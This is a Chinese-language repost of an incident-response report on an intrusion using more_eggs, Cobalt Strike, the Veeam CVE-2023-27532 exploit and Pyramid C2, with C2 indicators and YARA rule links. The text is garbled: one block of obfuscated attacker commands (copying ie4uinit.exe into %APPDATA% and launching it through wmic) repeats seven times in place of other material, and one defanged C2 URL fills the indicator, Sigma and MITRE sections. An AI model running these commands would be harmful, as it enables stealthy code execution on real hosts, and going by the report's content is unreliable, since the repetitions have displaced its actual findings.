%WINDIR%system32cmd.exe /S /D /c" set "Pupils4=Involves Bestsellers Clubs Discussions Crane Acquire Switch Young Estates Advisors Presents Calls Subscriptions Replies Rangers Con
Quote Thesis Makers Gives Folks Quality Vital Posters Paintings Diamond Legend Crucial Installations Across Surplus Double Diabetes Centuries Stadium Unveil Input Segment Databases
Disabilities Desert Baskets Ghost Recall Illustrations Pattern Friend Spoon Agents Directories Paperbacks Spike Watches Pilot""
wmic process call create "%APPDATA%microsoftie4uinit.exe -basesettings"
%APPDATA%microsoftie4uinit.exe -basesetting
4在执行 netscan.exe 后不久,我们观察到 ICMP 流量突然增加,可以识别为一次网络中的 ping 扫描。以下是一个网络流量样本,展示了扫描过程中目标 IP 地址的逐步增加。
通过查看受感染用户的 Shellbags,我们能够识别出威胁行为者在网络中的文件共享中翻找文件。
在滩头主机上,威胁行为者枚举了本地账户,相关操作通过创建多个 Windows 事件 ID 4799 来记录,调用进程为 “Rundll32.exe”。通过将 CallerProcessID 从十六进制转换为十进制,我们能够关联并确认该操作由 Cobalt Strike 进程发起。
横向移动
在利用 CVE-2023-27532 漏洞创建了本地管理员账户后,威胁行为者通过远程桌面协议(RDP)连接到 Veeam 备份服务器。随后,他们再次通过 RDP 从备份服务器跃迁到环境中的第二台服务器。
由于他们通过现有的恶意软件代理请求,工作站的名称在认证事件中泄露,表明他们很可能正在使用 Kali 操作系统。
一旦进入备份服务器,威胁行为者便通过使用 rundll32.exe 在主机上运行了 Cobalt Strike。
%WINDIR%system32cmd.exe /S /D /c" call xcopy /Y /C /Q %%windir%%system32ie4uinit.exe "%APPDATA%microsoft*" "
%WINDIR%system32cmd.exe /S /D /c" set Pupils59=Seats "
xcopy /Y /C /Q %WINDIR%system32ie4uinit.exe "%APPDATA%microsoft*"
%WINDIR%system32cmd.exe /S /D /c" start "" wmic process call create "%APPDATA%microsoftie4uinit.exe -basesettings" "
%WINDIR%system32cmd.exe /S /D /c" set "Pupils4=Involves Bestsellers Clubs Discussions Crane Acquire Switch Young Estates Advisors Presents Calls Subscriptions Replies Rangers Con
Quote Thesis Makers Gives Folks Quality Vital Posters Paintings Diamond Legend Crucial Installations Across Surplus Double Diabetes Centuries Stadium Unveil Input Segment Databases
Disabilities Desert Baskets Ghost Recall Illustrations Pattern Friend Spoon Agents Directories Paperbacks Spike Watches Pilot""
wmic process call create "%APPDATA%microsoftie4uinit.exe -basesettings"
%APPDATA%microsoftie4uinit.exe -basesetting
5该信标具有与滩头主机上使用的相同的 C2 细节。
此外,另一台威胁行为者的工作站名称“PACKERP-VUDV41R”在备份服务器的身份验证日志中泄露。
值得注意的是,主机名称“kali”和“PACKERP-VUDV41R”在《Arctic Fox》文章中有关FOG勒索病毒案件的报告中也有所提及,并且该报告中还提到了本报告中提到的几个工具。
远程服务创建
在利用Veeam并成功访问备份服务器后,攻击者获得了一个域管理员账户的凭证。使用该账户,他们在管理服务器上创建了一个远程服务,并创建了一个名为sqlbackup的用户,其属性与在备份服务器上创建的用户相同。
通过以下Suricata规则,可以在网络中观察到此活动:
%WINDIR%system32cmd.exe /S /D /c" call xcopy /Y /C /Q %%windir%%system32ie4uinit.exe "%APPDATA%microsoft*" "
%WINDIR%system32cmd.exe /S /D /c" set Pupils59=Seats "
xcopy /Y /C /Q %WINDIR%system32ie4uinit.exe "%APPDATA%microsoft*"
%WINDIR%system32cmd.exe /S /D /c" start "" wmic process call create "%APPDATA%microsoftie4uinit.exe -basesettings" "
%WINDIR%system32cmd.exe /S /D /c" set "Pupils4=Involves Bestsellers Clubs Discussions Crane Acquire Switch Young Estates Advisors Presents Calls Subscriptions Replies Rangers Con
Quote Thesis Makers Gives Folks Quality Vital Posters Paintings Diamond Legend Crucial Installations Across Surplus Double Diabetes Centuries Stadium Unveil Input Segment Databases
Disabilities Desert Baskets Ghost Recall Illustrations Pattern Friend Spoon Agents Directories Paperbacks Spike Watches Pilot""
wmic process call create "%APPDATA%microsoftie4uinit.exe -basesettings"
%APPDATA%microsoftie4uinit.exe -basesetting
6在远程管理服务器上,本地创建了7045事件,随后触发了进程事件,用于在主机上本地创建用户账户。
在执行完这些操作后,威胁行为者再次通过RDP访问了该主机。
指挥与控制
在整个攻击过程中,more_eggs恶意软件是最主要的指挥控制(C2)流量来源,直到威胁行为者将Cobalt Strike部署到网络中,Cobalt Strike的流量显著增加。如下面的图表所示,Pyramid C2仅使用过一次。
more_eggs
more_eggs有效载荷与以下指挥控制地址进行了通信:
| IP | Port | Domain |
|---|---|---|
| 108.174.197.15 | 443 | pin.howasit[.]com |
该IP地址自2024年3月中旬起至2024年11月由DFIR威胁情报小组跟踪,仍处于活跃状态。
Cobalt Strike
完整的信标配置无法恢复,但在对整个环境进行内存扫描时,部分配置被捕获。
%WINDIR%system32cmd.exe /S /D /c" call xcopy /Y /C /Q %%windir%%system32ie4uinit.exe "%APPDATA%microsoft*" "
%WINDIR%system32cmd.exe /S /D /c" set Pupils59=Seats "
xcopy /Y /C /Q %WINDIR%system32ie4uinit.exe "%APPDATA%microsoft*"
%WINDIR%system32cmd.exe /S /D /c" start "" wmic process call create "%APPDATA%microsoftie4uinit.exe -basesettings" "
%WINDIR%system32cmd.exe /S /D /c" set "Pupils4=Involves Bestsellers Clubs Discussions Crane Acquire Switch Young Estates Advisors Presents Calls Subscriptions Replies Rangers Con
Quote Thesis Makers Gives Folks Quality Vital Posters Paintings Diamond Legend Crucial Installations Across Surplus Double Diabetes Centuries Stadium Unveil Input Segment Databases
Disabilities Desert Baskets Ghost Recall Illustrations Pattern Friend Spoon Agents Directories Paperbacks Spike Watches Pilot""
wmic process call create "%APPDATA%microsoftie4uinit.exe -basesettings"
%APPDATA%microsoftie4uinit.exe -basesetting
7| 域名 | shehasgone[.]com |
|---|---|
| IP地址 | 144.208.127[.]15 |
| 端口 | 443 |
| JA3 | a0e9f5d64349fb13191bc781f81f42e1 |
| JA3s | d32d6a0ff9d52869cb6d4ab402b7306c |
| JA4 | t12d190800_d83cc789557e_16bbda4055b2 |
| JA4s | t120300_c02c_52d195ce1d92 |
该IP和域名仅在2024年3月期间活跃,DFIR威胁情报组还观察到该域名与IP地址109.104.152.24相关联,尽管该地址在此次入侵中未被观察到。
CloudFlare 隧道
攻击者在两台服务器主机上建立了 CloudFlared 隧道。一台主机在入侵期间显示与 CloudFlare 的 IPv4 范围保持持久连接。
DNS 查询请求指向以下域名:
部署 Pyramid C2
威胁行为者通过 Cobalt Strike beacon 传输了文件 python-3.10.4-embed-amd64.zip。该压缩文件包含多个文件,其中包括一个针对 Veeam 的漏洞利用工具。该文件被放置在滩头主机的用户可写 ProgramData 文件夹中。
该压缩文件伪装成 Python-3.10 安装包。攻击者尝试通过 PowerShell 命令提取压缩文件内容,尝试了多个组合,但最终失败。
威胁行为者决定改为使用 Windows 提供的工具“Tar”。
威胁行为者使用 Tar 工具时,并未指定目标路径。因此,默认情况下,提取的文件被创建在 WindowsSystem32 文件夹中,共超过 200 个文件。
威胁行为者并未气馁,转而使用他们在 ProgramData 文件夹中下载的 7zip 命令行工具。
%WINDIR%system32cmd.exe /S /D /c" call xcopy /Y /C /Q %%windir%%system32ie4uinit.exe "%APPDATA%microsoft*" "
%WINDIR%system32cmd.exe /S /D /c" set Pupils59=Seats "
xcopy /Y /C /Q %WINDIR%system32ie4uinit.exe "%APPDATA%microsoft*"
%WINDIR%system32cmd.exe /S /D /c" start "" wmic process call create "%APPDATA%microsoftie4uinit.exe -basesettings" "
%WINDIR%system32cmd.exe /S /D /c" set "Pupils4=Involves Bestsellers Clubs Discussions Crane Acquire Switch Young Estates Advisors Presents Calls Subscriptions Replies Rangers Con
Quote Thesis Makers Gives Folks Quality Vital Posters Paintings Diamond Legend Crucial Installations Across Surplus Double Diabetes Centuries Stadium Unveil Input Segment Databases
Disabilities Desert Baskets Ghost Recall Illustrations Pattern Friend Spoon Agents Directories Paperbacks Spike Watches Pilot""
wmic process call create "%APPDATA%microsoftie4uinit.exe -basesettings"
%APPDATA%microsoftie4uinit.exe -basesetting
8不幸的是,威胁行为者再次犯了类似的错误,这次文件(超过 200 个)被提取到了 WindowsSysWOW64 文件夹。这是因为他们的命令会话当前目录位于 C:WindowsSystem32,而且所使用的应用程序是 32 位的(SysWOW64)。
威胁行为者意识到错误后,切换到了正确的当前目录 C:ProgramDataSSH。然后他们再次使用 7za 工具,将文件(超过 200 个)提取到了正确的位置。
在这个过程中,观察到大量的文件创建事件(超过 700 个文件),其中包含了 Python 文件(.py 扩展名),这些文件被创建在 Windows 文件夹中一些不太常见的位置。
一旦解压完成,攻击者运行了以下 Python 文件:
%WINDIR%system32cmd.exe /S /D /c" call xcopy /Y /C /Q %%windir%%system32ie4uinit.exe "%APPDATA%microsoft*" "
%WINDIR%system32cmd.exe /S /D /c" set Pupils59=Seats "
xcopy /Y /C /Q %WINDIR%system32ie4uinit.exe "%APPDATA%microsoft*"
%WINDIR%system32cmd.exe /S /D /c" start "" wmic process call create "%APPDATA%microsoftie4uinit.exe -basesettings" "
%WINDIR%system32cmd.exe /S /D /c" set "Pupils4=Involves Bestsellers Clubs Discussions Crane Acquire Switch Young Estates Advisors Presents Calls Subscriptions Replies Rangers Con
Quote Thesis Makers Gives Folks Quality Vital Posters Paintings Diamond Legend Crucial Installations Across Surplus Double Diabetes Centuries Stadium Unveil Input Segment Databases
Disabilities Desert Baskets Ghost Recall Illustrations Pattern Friend Spoon Agents Directories Paperbacks Spike Watches Pilot""
wmic process call create "%APPDATA%microsoftie4uinit.exe -basesettings"
%APPDATA%microsoftie4uinit.exe -basesetting
9在分析文件 crade.py 并解码其内容时,我们识别出它是一个 Pyramid beacon,具有以下配置:
hxxp://a92837f.johnshimkus[.]com/setthevar
0DFIR 威胁情报组发现,该 C2 框架使用的 IP 地址在 2024 年 3 月、7 月和 9 月期间有间歇性活动。
时间线
钻石模型
指标
原子操作
hxxp://a92837f.johnshimkus[.]com/setthevar
1计算结果
hxxp://a92837f.johnshimkus[.]com/setthevar
2ProofPoint 提供的附加指标
hxxp://a92837f.johnshimkus[.]com/setthevar
3检测方法
网络
hxxp://a92837f.johnshimkus[.]com/setthevar
4Sigma
DFIR Public Rules Repo:
hxxp://a92837f.johnshimkus[.]com/setthevar
5DFIR Private Rules:
hxxp://a92837f.johnshimkus[.]com/setthevar
6Sigma Repo:
hxxp://a92837f.johnshimkus[.]com/setthevar
7Yara
https://github.com/The-DFIR-Report/Yara-Rules/blob/main/27899/27899.yar
额外规则:
https://github.com/chronicle/GCTI/blob/main/YARA/CobaltStrike/CobaltStrike__Resources_Httpsstager64_Bin_v3_2_through_v4_x.yara
https://github.com/Neo23x0/signature-base/blob/master/yara/apt_cobaltstrike_evasive.yar#L16
https://github.com/avast/ioc/blob/master/CobaltStrike/yara_rules/cs_rules.yar#L306
https://github.com/Neo23x0/signature-base/blob/master/yara/apt_cobaltstrike.yar#L90
https://github.com/Neo23x0/signature-base/blob/master/yara/apt_cobaltstrike.yar#L54
https://github.com/elastic/protections-artifacts/blob/main/yara/rules/Windows_Trojan_CobaltStrike.yar#L1037
https://github.com/elastic/protections-artifacts/blob/main/yara/rules/Windows_Trojan_CobaltStrike.yar#L829
https://github.com/elastic/protections-artifacts/blob/main/yara/rules/Windows_Trojan_CobaltStrike.yar#L1058
https://github.com/elastic/protections-artifacts/blob/main/yara/rules/Windows_Trojan_CobaltStrike.yar#L849
https://github.com/elastic/protections-artifacts/blob/main/yara/rules/Windows_Trojan_Metasploit.yar#L41
https://github.com/elastic/protections-artifacts/blob/main/yara/rules/Windows_Trojan_Metasploit.yar#L121
https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L963C5-L963C6
MITRE ATT&CK 映射
hxxp://a92837f.johnshimkus[.]com/setthevar
8文章来源
https://thedfirreport.com/2024/12/02/the-curious-case-of-an-egg-cellent-resume/
| 出现时间 | 病毒名称 | 相关文章 |
|---|---|---|
| 2020/01 | .mkp | |
| 2024/05 | .moneyistime | |
| 2024/09/29 | .lol | |
| 2024/06/21 | .MBRlock | |
| 2024/06/01 | .steloj | |
| 2024/05/27 | .TargetOwner | |
| 2024/05/17 | .Lockbit 3.0 | |
| 2024/05/13 | .wormhole | |
| 2024/04/09 | .bianlian | |
| 2024/03/20 | .locked | |
| 2024/03/11 | .Live1.5 | |
| 2024/03/08 | .Live2.0 | |
| 2024/03/06 | .Elbie | |
| 2024/03/01 | .lvt | |
| 2024/02/26 | .2700 | |
| 2024/01/18 | ._locked | |
| 2024/01/15 | .faust | |
| 2024/01/15 | .DevicData | |
| 2024/01/02 | .jopanaxye | |
| 2023/12/01 | .live1.0 | |
| 2023/09/05 | .CryptoBytes | |
| 2023/08/28 | .mallox | |
| 2023/08/02 | .rmallox | |
| 2023/01/10 | .DevicData-Pa2a9e9c | |
| 2023年初 | .halo | |
| 2021/05/01 | .mallox | |
| 2021年1月初 | .babyk | |
| 2020/05/18 | .consultraskey-F-XXXX | |
| 2019/05/01 | .src |
推荐站内搜索:最好用的开发软件、免费开源系统、渗透测试工具云盘下载、最新渗透测试资料、最新黑客工具下载……
还没有评论,来说两句吧...